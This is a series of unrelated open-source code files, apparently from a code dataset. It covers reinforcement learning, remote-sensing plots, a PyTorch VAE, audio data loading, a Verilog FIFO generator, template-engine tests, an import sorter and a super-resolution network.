tr_x,tr_y,prob_actions = [],[],[]
# Checkpoint
os.remove(self.model_path) if os.path.exists(self.model_path) else None
self.model.save(self.model_path)
avg_reward.append(float(reward_sum))
if len(avg_reward)>30: avg_reward.pop(0)
print('Epsidoe {:} reward {:.2f}, Last 30ep Avg. rewards {:.2f}.'.format(ep_number,reward_sum,np.mean(avg_reward)))
print('{:.4f},{:.4f}'.format(reward_sum,np.mean(avg_reward)),end='\n',file=log,flush=True)
reward_sum = 0
observation = self.env.reset()
prev_x = None
def make_action(self, observation, test=True):
"""
Input:
observation: np.array
current RGB screen of game, shape: (210, 160, 3)
Return:
action: int
the predicted action from trained model
"""
cur_x = prepro(observation)
x = cur_x - self.prev_x if self.prev_x is not None else np.zeros(cur_x.shape)
self.prev_x = cur_x
aprob = self.model.predict(x.reshape((1,80,80,1)), batch_size=1).flatten()
return np.argmax(aprob)
|
the-stack_106_19075
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 26 14:58:57 2019
@author: Administrator
MCD12 LandCover Types:
DBF == 4:DBF,5:MF
EBF == 2:EBF
NF == 1:ENF,3:DNF
CRO == 12: CRO, 14: CRO&NV
GRA == 10: GRA
SHR == 6:CSH, 7:OSH
SAV == 8:WSA, 9:SAV
"""
import numpy as np
import matplotlib.pyplot as plt
import os
from osgeo import gdal_array
import matplotlib.gridspec as gridspec
import warnings
warnings.filterwarnings('ignore')
in_file_path = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step14.Boreal_Map"
landcover_file = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step14.Boreal_Map\MOD12_LandUse_N.tif"
plot_path = r"F:\Chlorophyll_Fluorescence\Process\Europe\Step4.Table\Polygon\4.11.Box_Plot_His"
Products = ["TROPOMI_SC","TROPOMI_SR","NIRv","EVI"]
LandCover = ["DBF", "NF", "SAV", "GRA", "SHR", "CRO"]
LC_CODE = [[4,5],[1,3],[8,9],[10],[6,7],[12,14]]
Metrics = [1,3,5] #1,3,5分别代表SOS,EOS,LOS
Name = ["DBF", "NF", "SAV", "GRA", "SHR", "CRO"]
nrows = 2
ncols = 3
figure_scale_row = nrows * 2.0
figure_scale_col = ncols * 2.0
fig = plt.figure(figsize=(figure_scale_col, figure_scale_row))#, sharey=True)
gs = gridspec.GridSpec(nrows, ncols, wspace=0.1, hspace=0.6)
fs = 5 # fontsize
x_labels = ['SOS', 'EOS', 'GSL'] #'Tropomi_SR', 'MODIS', 'OCO-2']
y_lables = [0, 100, 200, 300]
min_y = 0
max_y = 365
ny = 4 #y轴刻度个数
bar_width = 0.15 #柱状体宽度
capsize = 1.2 #柱状体标准差参数1
capthick = 0.8 #柱状体标准差参数2
elinewidth = 0.8 #柱状体标准差参数3
linewidth = 1.0 #边框线宽度
ftsize = 10 #字体大小
ftfamily = "Times New Roman"
axlength = 2.0 #轴刻度长度
axwidth = 1.2 #轴刻度宽度
legendcols = 5 #图例一行的个数
for i in range(len(LandCover)):
mean = []
err = []
for j in range(len(Metrics)):
lc_array = gdal_array.LoadFile(landcover_file)
SIF_SC_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.SC_GSL_Mask/SC_{0}.tif".format(Metrics[j])))
SIF_SR_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.SR_GSL_Mask/SR_{0}.tif".format(Metrics[j])))
dcSIF_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.dcSIF_GSL_Mask/dcSIF_{0}.tif".format(Metrics[j])))
EVI_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.EVI_GSL_Mask/EVI_{0}.tif".format(Metrics[j])))
NIRv_array = gdal_array.LoadFile(os.path.join(in_file_path, "14.1.NIRv_GSL_Mask/NIRv_{0}.tif".format(Metrics[j])))
SIF_SC = []
SIF_SR = []
dcSIF = []
NIRv = []
EVI = []
for m in range(len(lc_array)):
for n in range(len(lc_array[0])):
if lc_array[m,n] in LC_CODE[i]:
if abs(SIF_SC_array[m,n]) < 999:
SIF_SC.append(SIF_SC_array[m,n])
if abs(SIF_SR_array[m,n]) < 999:
SIF_SR.append(SIF_SR_array[m,n])
if abs(dcSIF_array[m,n]) < 999:
dcSIF.append(dcSIF_array[m,n])
if abs(NIRv_array[m,n]) < 999:
NIRv.append(NIRv_array[m,n])
if abs(EVI_array[m,n]) < 999:
EVI.append(EVI_array[m,n])
mean.append([np.nanmean(SIF_SC), np.nanmean(SIF_SR), np.nanmean(dcSIF), np.nanmean(NIRv), np.nanmean(EVI)])
err.append([np.nanstd(SIF_SC), np.nanstd(SIF_SR), np.nanstd(dcSIF), np.nanstd(NIRv), np.nanstd(EVI)])
mean = np.array(mean)
err = np.array(err)
#画直方图
x = np.arange(int(len(x_labels)))
col = int(i % ncols)
row = int(i / ncols)
axes = fig.add_subplot(gs[row, col])
SIF_SC = axes.bar(x + 0 * bar_width, mean[:,0], bar_width, yerr = err[:,0], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="olivedrab", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_t$$_o$$_t$$_a$$_l$$_-$$_S$$_C$", align="center", alpha=1)
SIF_SR = axes.bar(x + 1 * bar_width, mean[:,1], bar_width, yerr = err[:,1], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="yellowgreen", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_t$$_o$$_t$$_a$$_l$$_-$$_S$$_R$", align="center", alpha=1)
dcSIF = axes.bar(x + 2 * bar_width, mean[:,2], bar_width, yerr = err[:,2], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="forestgreen", label = "SIF$_T$$_R$$_O$$_P$$_O$$_M$$_I$$_\_$$_O$$_b$$_s$", align="center", alpha=1)
NIRv = axes.bar(x + 3 * bar_width, mean[:,3], bar_width, yerr = err[:,3], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="darkgoldenrod", label = "NIRv", align="center", alpha=1)
EVI = axes.bar(x + 4 * bar_width, mean[:,4], bar_width, yerr = err[:,4], error_kw = {'ecolor' : '0.2', 'elinewidth':elinewidth, 'capsize' :capsize, 'capthick' :capthick}, color="gold", label = "EVI", align="center", alpha=1)
axes.set_title("({0}) {1}".format(chr(97+i),Name[i]), fontsize = ftsize/1.2, family = ftfamily)
axes.set_xticks(x + 2 * bar_width)
axes.set_xticklabels(x_labels, fontsize = fs, family = ftfamily)
axes.set_ylim(min_y, max_y)
axes.spines['left'].set_linewidth(linewidth)
axes.spines['right'].set_linewidth(linewidth)
axes.spines['top'].set_linewidth(linewidth)
axes.spines['bottom'].set_linewidth(linewidth)
axes.tick_params(axis='both', length = axlength, width = axwidth, labelsize = ftsize/1.5)
if col == 0:
axes.set_ylabel('Day of Year (days)', fontsize = ftsize/1.6, family=ftfamily)
axes.set_yticks(np.linspace(min_y, max_y - 65, ny))
axes.set_yticklabels(y_lables, fontsize = fs + 2, family=ftfamily)
else:
axes.yaxis.set_visible(False)
axes.set_xlabel('Phenological Metrics', fontsize = ftsize/1.5, family=ftfamily)
handles = [SIF_SC, SIF_SR, dcSIF, NIRv, EVI]
labels = ['SIF$_\mathdefault{total-SC}$',\
'SIF$_\mathdefault{total-SR}$',\
'SIF$_\mathdefault{Obs}$',\
'NIR$_\mathdefault{V}$','EVI']
"""
if i == 0:
axes.legend(handles, labels, loc ='upper left', fancybox = False, shadow = False,frameon = False,
ncol = legendcols, prop={'family':ftfamily, 'size':ftsize/3})
"""
fig.legend(handles, labels, loc ='lower center', fancybox = False, shadow = False,frameon = False,
ncol = legendcols, handletextpad = 0.2, columnspacing = 1.5, prop={'family':"Times New Roman", 'size':ftsize/1.3})
fig.tight_layout()
fig.subplots_adjust(left = None, right = None, bottom = 0.15)
Plot_path = os.path.join(plot_path, "Rs2-Global.jpg")
plt.show()
fig.savefig(Plot_path, dpi=600, quality=100,bbox_inches='tight')
|
the-stack_106_19076
|
import torch
import torch.nn.functional as nn
import torch.autograd as autograd
import torch.optim as optim
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
from torch.autograd import Variable
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True)
mb_size = 64
Z_dim = 100
X_dim = mnist.train.images.shape[1]
y_dim = mnist.train.labels.shape[1]
h_dim = 128
c = 0
lr = 1e-3
def xavier_init(size):
in_dim = size[0]
xavier_stddev = 1. / np.sqrt(in_dim / 2.)
return Variable(torch.randn(*size) * xavier_stddev, requires_grad=True)
# =============================== Q(z|X) ======================================
Wxh = xavier_init(size=[X_dim, h_dim])
bxh = Variable(torch.zeros(h_dim), requires_grad=True)
Whz_mu = xavier_init(size=[h_dim, Z_dim])
bhz_mu = Variable(torch.zeros(Z_dim), requires_grad=True)
Whz_var = xavier_init(size=[h_dim, Z_dim])
bhz_var = Variable(torch.zeros(Z_dim), requires_grad=True)
def Q(X):
h = nn.relu(X @ Wxh + bxh.repeat(X.size(0), 1))
z_mu = h @ Whz_mu + bhz_mu.repeat(h.size(0), 1)
z_var = h @ Whz_var + bhz_var.repeat(h.size(0), 1)
return z_mu, z_var
def sample_z(mu, log_var):
eps = Variable(torch.randn(mb_size, Z_dim))
return mu + torch.exp(log_var / 2) * eps
# =============================== P(X|z) ======================================
Wzh = xavier_init(size=[Z_dim, h_dim])
bzh = Variable(torch.zeros(h_dim), requires_grad=True)
Whx = xavier_init(size=[h_dim, X_dim])
bhx = Variable(torch.zeros(X_dim), requires_grad=True)
def P(z):
h = nn.relu(z @ Wzh + bzh.repeat(z.size(0), 1))
X = nn.sigmoid(h @ Whx + bhx.repeat(h.size(0), 1))
return X
# =============================== TRAINING ====================================
params = [Wxh, bxh, Whz_mu, bhz_mu, Whz_var, bhz_var,
Wzh, bzh, Whx, bhx]
solver = optim.Adam(params, lr=lr)
for it in range(100000):
X, _ = mnist.train.next_batch(mb_size)
X = Variable(torch.from_numpy(X))
# Forward
z_mu, z_var = Q(X)
z = sample_z(z_mu, z_var)
X_sample = P(z)
# Loss
recon_loss = nn.binary_cross_entropy(X_sample, X, size_average=False) / mb_size
kl_loss = torch.mean(0.5 * torch.sum(torch.exp(z_var) + z_mu**2 - 1. - z_var, 1))
loss = recon_loss + kl_loss
# Backward
loss.backward()
# Update
solver.step()
# Housekeeping
for p in params:
p.grad.data.zero_()
# Print and plot every now and then
if it % 1000 == 0:
print('Iter-{}; Loss: {:.4}'.format(it, loss.data[0]))
samples = P(z).data.numpy()[:16]
fig = plt.figure(figsize=(4, 4))
gs = gridspec.GridSpec(4, 4)
gs.update(wspace=0.05, hspace=0.05)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample.reshape(28, 28), cmap='Greys_r')
if not os.path.exists('out/'):
os.makedirs('out/')
plt.savefig('out/{}.png'.format(str(c).zfill(3)), bbox_inches='tight')
c += 1
plt.close(fig)
|
the-stack_106_19078
|
# -*- coding: utf-8 -*-
__author__ = 'S.I. Mimilakis'
__copyright__ = 'Fraunhofer IDMT'
# imports
import os
import torch
import numpy as np
from tools import io_methods as io
class DataIO:
""" Class for data
input-output passing.
"""
def __init__(self, exp_settings={}):
super(DataIO, self).__init__()
# definitions
self.dataset_path = '/some/path/Datasets/musdb18/'
self.keywords = ['bass.wav', 'drums.wav', 'other.wav', 'vocals.wav', 'mixture.wav']
self.foldersList = ['train', 'test']
self.d_p_length = exp_settings['d_p_length']
self.fs = exp_settings['fs']
self.batch_overlap = exp_settings['batch_overlap']
self.batch_size = exp_settings['batch_size']
self.loudness_threshold = exp_settings['loudness_threshold']
try:
self.channel_augmentation = exp_settings['ch_augment']
self.gain_augmentation = exp_settings['gain_augment']
except KeyError:
self.channel_augmentation = False
self.gain_augmentation = False
def get_data(self, current_set, set_size, monaural=True, dev=True):
"""
Method to load training data.
current_set : (int) An integer denoting the current training set (Starting from "1").
set_size : (int) The amount of files a set has.
monaural : (bool) Return monaural audio files or not.
Returns:
mix_out : (numpy array) The mixture signal waveform (samples x channels)
vox_out : (numpy array) The vocal signal waveform (samples x channels)
bkg_out : (numpy array) The background signal waveform (samples x channels)
"""
if dev:
folders_list = self.foldersList[0]
else:
folders_list = self.foldersList[1]
# Generate full paths for dev and test
dev_list = sorted(os.listdir(self.dataset_path + folders_list))
dev_list = [self.dataset_path + folders_list + '/' + i for i in dev_list]
# Current lists for training
c_train_mlist = dev_list[(current_set - 1) * set_size: current_set * set_size]
mix_out = np.array([])
vox_out = np.array([])
bkg_out = np.array([])
if not monaural:
mix_out.shape = (0, 2)
vox_out.shape = (0, 2)
bkg_out.shape = (0, 2)
for index in range(len(c_train_mlist)):
# Reading
vocal_signal, or_fs = io.wav_read(os.path.join(c_train_mlist[index], self.keywords[3]), mono=False)
mix_signal, or_fs = io.wav_read(os.path.join(c_train_mlist[index], self.keywords[4]), mono=False)
if self.channel_augmentation:
fl_channels = np.random.permutation(2)
vocal_signal = vocal_signal[:, fl_channels]
mix_signal = mix_signal[:, fl_channels]
bkg_signal = mix_signal - vocal_signal
if self.gain_augmentation:
gain = np.random.uniform(0.7, 1.05)
vocal_signal *= gain
mix_signal = bkg_signal + vocal_signal
if monaural and len(mix_signal.shape) == 2:
vocal_signal = np.mean(vocal_signal, axis=-1)
mix_signal = np.mean(mix_signal, axis=-1)
bkg_signal = np.mean(bkg_signal, axis=-1)
mix_out = np.concatenate([mix_out, mix_signal], axis=0)
vox_out = np.concatenate([vox_out, vocal_signal], axis=0)
bkg_out = np.concatenate([bkg_out, bkg_signal], axis=0)
return mix_out, vox_out, bkg_out
def gimme_batches(self, wav_in):
d_p_length_samples = self.d_p_length * self.fs
resize_factor = d_p_length_samples - self.batch_overlap
trim_frame = wav_in.shape[0] % resize_factor
trim_frame -= resize_factor
trim_frame = np.abs(trim_frame)
# Zero-padding
if trim_frame != 0:
wav_in = np.pad(wav_in, (0, trim_frame), 'constant', constant_values=0)
# Reshaping with overlap
strides = (resize_factor * wav_in.itemsize, wav_in.itemsize)
shape = (1 + int((wav_in.nbytes - d_p_length_samples * wav_in.itemsize) / strides[0]),
d_p_length_samples)
wav_in = np.lib.stride_tricks.as_strided(wav_in, shape=shape, strides=strides)
b_trim_frame = wav_in.shape[0] % self.batch_size
b_trim_frame -= self.batch_size
b_trim_frame = np.abs(b_trim_frame)
# Zero-padding
if b_trim_frame != 0:
wav_in = np.pad(wav_in, (0, b_trim_frame), 'constant', constant_values=(0, 0))
return wav_in[:, :d_p_length_samples]
def gimme_batches_stereo(self, st_wav_in):
wav_l = self.gimme_batches(st_wav_in[:, 0])
wav_r = self.gimme_batches(st_wav_in[:, 1])
return np.stack((wav_l, wav_r), axis=1)
@staticmethod
def batches_from_numpy(st_batch_in):
if torch.has_cuda:
return torch.from_numpy(st_batch_in).cuda().float()
else:
return torch.from_numpy(st_batch_in).float()
if __name__ == '__main__':
io_dealer = DataIO()
mix, vox, bkg = io_dealer.get_data(42, 4, monaural=True)
b_mix = io_dealer.gimme_batches(mix)
# EOF
|
the-stack_106_19079
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen.core.vtypes as vtypes
import veriloggen.core.module as module
from veriloggen.seq.seq import Seq
from . import util
class FifoWriteInterface(object):
_I = 'Reg'
_O = 'Wire'
def __init__(self, m, name=None, datawidth=32, itype=None, otype=None,
p_enq='enq', p_wdata='wdata', p_full='full', p_almost_full='almost_full'):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
name_enq = p_enq if name is None else '_'.join([name, p_enq])
name_wdata = p_wdata if name is None else '_'.join([name, p_wdata])
name_full = p_full if name is None else '_'.join([name, p_full])
name_almost_full = p_almost_full if name is None else '_'.join(
[name, p_almost_full])
self.enq = util.make_port(m, itype, name_enq, initval=0)
self.wdata = util.make_port(m, itype, name_wdata, datawidth, initval=0)
self.full = util.make_port(m, otype, name_full, initval=0)
self.almost_full = util.make_port(
m, otype, name_almost_full, initval=0)
def connect(self, targ):
self.enq.connect(targ.enq)
self.wdata.connect(targ.wdata)
targ.full.connect(self.full)
targ.almost_full.connect(self.almost_full)
class FifoReadInterface(object):
_I = 'Reg'
_O = 'Wire'
def __init__(self, m, name=None, datawidth=32, itype=None, otype=None,
p_deq='deq', p_rdata='rdata', p_empty='empty', p_almost_empty='almost_empty'):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
name_deq = p_deq if name is None else '_'.join([name, p_deq])
name_rdata = p_rdata if name is None else '_'.join([name, p_rdata])
name_empty = p_empty if name is None else '_'.join([name, p_empty])
name_almost_empty = p_almost_empty if name is None else '_'.join(
[name, p_almost_empty])
self.deq = util.make_port(m, itype, name_deq, initval=0)
self.rdata = util.make_port(m, otype, name_rdata, datawidth, initval=0)
self.empty = util.make_port(m, otype, name_empty, initval=0)
self.almost_empty = util.make_port(
m, otype, name_almost_empty, initval=0)
def connect(self, targ):
self.deq.connect(targ.deq)
targ.rdata.connect(self.rdata)
targ.empty.connect(self.empty)
targ.almost_empty.connect(self.almost_empty)
class FifoWriteSlaveInterface(FifoWriteInterface):
_I = 'Input'
_O = 'Output'
class FifoWriteMasterInterface(FifoWriteInterface):
_I = 'Output'
_O = 'Input'
class FifoReadSlaveInterface(FifoReadInterface):
_I = 'Input'
_O = 'Output'
class FifoReadMasterInterface(FifoReadInterface):
_I = 'Output'
_O = 'Input'
#-------------------------------------------------------------------------
def mkFifoDefinition(name, datawidth=32, addrwidth=4):
m = module.Module(name)
clk = m.Input('CLK')
rst = m.Input('RST')
wif = FifoWriteSlaveInterface(m, name, datawidth)
rif = FifoReadSlaveInterface(m, name, datawidth)
mem = m.Reg('mem', datawidth, 2**addrwidth)
head = m.Reg('head', addrwidth, initval=0)
tail = m.Reg('tail', addrwidth, initval=0)
is_empty = m.Wire('is_empty')
is_almost_empty = m.Wire('is_almost_empty')
is_full = m.Wire('is_full')
is_almost_full = m.Wire('is_almost_full')
mask = (2 ** addrwidth) - 1
is_empty.assign(head == tail)
is_almost_empty.assign(head == ((tail + 1) & mask))
is_full.assign(((head + 1) & mask) == tail)
is_almost_full.assign(((head + 2) & mask) == tail)
rdata = m.Reg('rdata_reg', datawidth, initval=0)
wif.full.assign(is_full)
wif.almost_full.assign(vtypes.Ors(is_almost_full, is_full))
rif.empty.assign(is_empty)
rif.almost_empty.assign(vtypes.Ors(is_almost_empty, is_empty))
seq = Seq(m, '', clk, rst)
seq.If(vtypes.Ands(wif.enq, vtypes.Not(is_full)))(
mem[head](wif.wdata),
head.inc()
)
seq.If(vtypes.Ands(rif.deq, vtypes.Not(is_empty)))(
rdata(mem[tail]),
tail.inc()
)
rif.rdata.assign(rdata)
seq.make_always()
return m
|
the-stack_106_19080
|
"""Bad context test cases."""
from unittest import TestCase
from typing import NamedTuple
from typing import Type
from liquid.context import builtin
from liquid.context import get_item
from liquid.context import _undefined
from liquid.context import ReadOnlyChainMap
from liquid.environment import Environment
from liquid.exceptions import LiquidTypeError
from liquid.exceptions import lookup_warning
from liquid.mode import Mode
class Case(NamedTuple):
"""Table driven test case helper."""
description: str
template: str
expect_exception: Type[Exception]
expect_msg: str
expect_render: str = ""
class BadContextTemplateTestCase(TestCase):
"""Bad context test case."""
def _test(self, test_cases, mode=Mode.STRICT):
"""Helper method for running lists of `Case`s"""
env = Environment()
env.mode = mode
global_context = {"arr": [], "hash": {}}
for case in test_cases:
with self.subTest(msg=case.description):
if mode == Mode.STRICT:
with self.assertRaises(case.expect_exception) as raised:
template = env.from_string(
case.template, globals=global_context
)
result = template.render()
self.assertEqual(str(raised.exception), case.expect_msg)
elif mode == Mode.WARN:
with self.assertWarns(lookup_warning(case.expect_exception)):
template = env.from_string(
case.template, globals=global_context
)
result = template.render()
elif mode == Mode.LAX:
template = env.from_string(case.template, globals=global_context)
result = template.render()
self.assertEqual(result, case.expect_render)
def test_bad_context(self):
"""Test that we handle render time errors due to incorrect context."""
test_cases = [
Case(
description="array less than hash",
template="{% if arr < hash %}foo{% endif %}",
expect_exception=LiquidTypeError,
expect_msg=r"invalid operator for types '[] < {}', on line 1",
),
]
self._test(test_cases, mode=Mode.STRICT)
self._test(test_cases, mode=Mode.WARN)
self._test(test_cases, mode=Mode.LAX)
class ReadOnlyChainMapTestCase(TestCase):
"""Read only chain map test case."""
def test_get(self):
"""Test that we can get items from a chain map."""
test_cases = [
{
"description": "earlier maps take priority",
"maps": ({"foo": 1}, {"foo": 2}),
"expect": 1,
},
{
"description": "fall back top later maps",
"maps": ({"bar": 1}, {"foo": 2}),
"expect": 2,
},
{
"description": "default to None",
"maps": ({"bar": 1}, {"bar": 2}),
"expect": None,
},
]
for case in test_cases:
with self.subTest(msg=case["description"]):
chain_map = ReadOnlyChainMap(*case["maps"])
self.assertEqual(chain_map.get("foo"), case["expect"])
def test_iter(self):
"""Test that we can iterate a chain map."""
chain_map = ReadOnlyChainMap({"foo": 1}, {"bar": 2}, {"foo": 3})
self.assertEqual(list(chain_map), ["foo", "bar", "foo"])
class ChainedItemGetterTestCase(TestCase):
"""Chained item getter test case."""
def test_get_item(self):
"""Test that we can get nested items."""
test_cases = [
{
"description": "single string key",
"obj": {"foo": 1},
"key": ["foo"],
"expect": 1,
},
{
"description": "chained string key",
"obj": {"foo": {"bar": 2}},
"key": ["foo", "bar"],
"expect": 2,
},
{
"description": "single int key",
"obj": ["foo", "bar"],
"key": [0],
"expect": "foo",
},
{
"description": "chained string and int key",
"obj": {"foo": [1, 2]},
"key": ["foo", 1],
"expect": 2,
},
{
"description": "default to undefined",
"obj": {"foo": 1},
"key": ["no", "such", "thing"],
"expect": _undefined,
},
]
for case in test_cases:
with self.subTest(msg=case["description"]):
self.assertEqual(get_item(case["obj"], *case["key"]), case["expect"])
class BuiltinDynamicScopeTestCase(TestCase):
"""Built-in dynamic scope test case."""
def test_builtin_contains_now(self):
"""Test that `now` is in the builtin scope."""
self.assertTrue("now" in builtin)
def test_builtin_contains_today(self):
"""Test that `today` is in the builtin scope."""
self.assertTrue("today" in builtin)
def test_builtin_not_contains(self):
"""Test that garbage is not in the builtin scope."""
self.assertFalse("foo" in builtin)
def test_builtin_length(self):
"""Test that builtin has a length."""
self.assertEqual(len(builtin), 2)
def test_builtin_iter(self):
"""Test that builtin has a length."""
self.assertEqual(list(builtin), ["now", "today"])
|
the-stack_106_19081
|
import argparse
import re
from pathlib import Path
from typing import Iterable
from typing import Set
import pkg_resources
from black import find_project_root
from black import gen_python_files_in_dir
from black import get_gitignore
from black import Report
from reorder_python_imports import fix_file_contents
EXCLUDES = re.compile(
r"/(\.eggs|\.git|\.hg|\.mypy_cache|\.nox|\.tox|\.venv|_build|buck-out|build|dist)/"
)
INCLUDES = re.compile(r"\.py$")
def get_source_files(paths: Iterable[str]) -> Iterable[Path]:
report = Report()
root = find_project_root((f for f in paths))
sources: Set[Path] = set()
for filename in paths:
path = Path(filename)
if path.is_dir():
sources.update(
gen_python_files_in_dir(
path=path,
root=root,
include=INCLUDES,
exclude=EXCLUDES,
report=report,
gitignore=get_gitignore(root),
)
)
elif path.is_file():
sources.add(path)
else:
print(f"Error: invalid path: {path}")
exit(1)
return sources
def get_version() -> str:
return pkg_resources.require("sorti")[0].version
def main() -> int:
parser = argparse.ArgumentParser(
description="Sorts imports in Python 3.7+ source files."
)
parser.add_argument("source", nargs="*")
parser.add_argument(
"--check",
action="store_true",
help="Check if sorti would like to make changes.",
)
parser.add_argument(
"--version", action="version", version=f"%(prog)s {get_version()}"
)
args = parser.parse_args()
if not args.source:
print("No sources given, doing nothing.")
return 0
sources = tuple(args.source)
num_would_change = 0
for path in get_source_files(sources):
with path.open("r") as file:
contents = file.read()
new_contents = fix_file_contents(contents)
if contents == new_contents:
continue
if args.check:
print(f"Would reformat {path}")
num_would_change += 1
continue
print(f"Reordering imports in {path}")
with path.open("w") as file:
file.write(new_contents)
if num_would_change and args.check:
print(
f"sorti would sort imports in {num_would_change} "
f"file{'s' if num_would_change != 1 else ''} "
)
return 1
elif args.check:
print("sorti would make no changes, all imports are sorted")
return 0
if __name__ == "__main__":
exit(main())
|
the-stack_106_19082
|
## ECCV-2018-Image Super-Resolution Using Very Deep Residual Channel Attention Networks
## https://arxiv.org/abs/1807.02758
from model import common
from model.attention import ContextualAttention
import torch.nn as nn
import torch
def make_model(args, parent=False):
return RCAN(args)
## Channel Attention (CA) Layer
class CALayer(nn.Module):
def __init__(self, channel, reduction=16):
super(CALayer, self).__init__()
# global average pooling: feature --> point
self.avg_pool = nn.AdaptiveAvgPool2d(1)
# feature channel downscale and upscale --> channel weight
#self.a = torch.nn.Parameter(torch.Tensor([0]))
#self.a.requires_grad=True
self.conv_du = nn.Sequential(
nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.conv_du(y)
return x * y
## Residual Channel Attention Block (RCAB)
class RCAB(nn.Module):
def __init__(
self, conv, n_feat, kernel_size, reduction,
bias=True, bn=False, act=nn.ReLU(True), res_scale=1):
super(RCAB, self).__init__()
modules_body = []
for i in range(2):
modules_body.append(conv(n_feat, n_feat, kernel_size, bias=bias))
if bn: modules_body.append(nn.BatchNorm2d(n_feat))
if i == 0: modules_body.append(act)
modules_body.append(CALayer(n_feat, reduction))
self.body = nn.Sequential(*modules_body)
self.res_scale = res_scale
def forward(self, x):
res = self.body(x)
#res = self.body(x).mul(self.res_scale)
res += x
return res
## Residual Group (RG)
class ResidualGroup(nn.Module):
def __init__(self, conv, n_feat, kernel_size, reduction, act, res_scale, n_resblocks):
super(ResidualGroup, self).__init__()
modules_body = []
modules_body = [
RCAB(
conv, n_feat, kernel_size, reduction, bias=True, bn=False, act=nn.ReLU(True), res_scale=1) \
for _ in range(n_resblocks)]
modules_body.append(conv(n_feat, n_feat, kernel_size))
self.body = nn.Sequential(*modules_body)
def forward(self, x):
res = self.body(x)
res += x
return res
## Residual Channel Attention Network (RCAN)
class RCAN(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(RCAN, self).__init__()
self.a = nn.Parameter(torch.Tensor([0]))
self.a.requires_grad=True
n_resgroups = args.n_resgroups
n_resblocks = args.n_resblocks
n_feats = args.n_feats
kernel_size = 3
reduction = args.reduction
scale = args.scale[0]
act = nn.ReLU(True)
# RGB mean for DIV2K
rgb_mean = (0.4488, 0.4371, 0.4040)
rgb_std = (1.0, 1.0, 1.0)
self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)
# define head module
modules_head = [conv(args.n_colors, n_feats, kernel_size)]
self.msa = ContextualAttention()
# define body module
modules_body = [
ResidualGroup(
conv, n_feats, kernel_size, reduction, act=act, res_scale=args.res_scale, n_resblocks=n_resblocks) \
for _ in range(5)]
modules_body.append(self.msa)
for i in range(5):
modules_body.append(ResidualGroup(conv,n_feats,kernel_size,reduction,act=act,res_scale=args.res_scale,n_resblocks=n_resblocks))
modules_body.append(conv(n_feats, n_feats, kernel_size))
# define tail module
modules_tail = [
common.Upsampler(conv, scale, n_feats, act=False),
conv(n_feats, args.n_colors, kernel_size)]
self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)
self.head = nn.Sequential(*modules_head)
self.body = nn.Sequential(*modules_body)
self.tail = nn.Sequential(*modules_tail)
def forward(self, x):
x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
res += x
x = self.tail(res)
x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=False):
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
if name.find('msa') or name.find('a') >= 0:
print('Replace pre-trained upsampler to new one...')
else:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('msa') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
if strict:
missing = set(own_state.keys()) - set(state_dict.keys())
if len(missing) > 0:
raise KeyError('missing keys in state_dict: "{}"'.format(missing))
|
the-stack_106_19084
|
import csv
from DACS import iso2DACS
windowsPath = "C:\\Users\\[USERNAME]\\python4archivists\\executedJuveniles.csv"
unixPath = "/home/[USERNAME]/python4archivists/executedJuveniles.csv"
csvFile = open(windowsPath, "r")
csvObject = csv.reader(csvFile)
#loop though the CSV file
for row in csvObject:
print(row[2])
csvFile.close()
"""
#set and empty list and initialize the count at 0
newList = []
rowCount = 0
#open the original CSV again and read it
csvFile = open(windowsPath, "r")
csvObject = csv.reader(csvFile)
for row in csvObject:
#count the number of times though the loop
rowCount = rowCount + 1
#if more than the first time though the loop
if rowCount > 1:
#make a list of the rowCount, the 3rd column, and the 4th column using the iso2DACS function
rowList = [rowCount - 1, row[2], iso2DACS(row[3])]
#append that list to the newList - its just a list of lists
newList.append(rowList)
#close the original CSV file
csvFile.close()
newCSV = "C:\\Users\\[USERNAME]\\python4archivists\\csvDACS.csv"
#newCSV = "/home/[USERNAME]/python4archivists/csvDACS.csv"
newFile = open(newCSV, "wb")
newCSV = csv.writer(newFile, delimiter=',')
newCSV.writerows(newList)
newFile.close()
"""
|
the-stack_106_19085
|
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
